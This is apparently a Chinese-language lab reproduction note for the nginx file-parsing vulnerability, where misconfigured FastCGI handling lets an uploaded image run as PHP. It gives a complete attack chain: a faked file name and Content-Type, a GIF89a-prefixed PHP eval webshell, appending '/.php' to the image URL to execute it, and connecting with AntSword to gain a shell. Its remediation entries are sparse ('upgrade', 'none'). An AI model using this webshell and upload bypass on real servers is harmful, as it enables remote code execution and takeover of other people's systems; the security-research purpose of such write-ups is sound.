nginx_解析漏洞
说明 | 内容 |
---|---|
漏洞编号 | |
漏洞名称 | nginx 解析漏洞 |
漏洞评级 | 高危 |
影响范围 | 该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞 |
漏洞描述 | 可以通过绕过上传图片马 |
修复方案 | 升级 |
漏洞描述
由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的照片文件。
漏洞等级
高危
影响版本
- 该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞
漏洞复现
基础环境
组件 | 版本 |
---|---|
OS | kali-linux |
Web Server | chrome |
Source Code |
漏洞扫描
漏洞验证
-
开启环境,访问主页
-
选择一句话木马+phpinfo上传,进行抓包
-
修改文件名
filename="1.php.png"
-
修改文件类型
Content-Type: image/png
-
修改文件内容
GIF89a <?php @eval($_REQUEST[333]);phpinfo()?>
-
访问文件
http://192.168.117.163/uploadfiles/588c7f4a8707b25751914e6f95379049.png
-
修改url
http://192.168.117.163/uploadfiles/588c7f4a8707b25751914e6f95379049.png/.php
深度利用
GetShell
当漏洞验证成功时,证明一句话木马已经成功执行,可以直接上蚁剑进行连接
漏洞挖掘
网络测绘
nginx
修复建议
无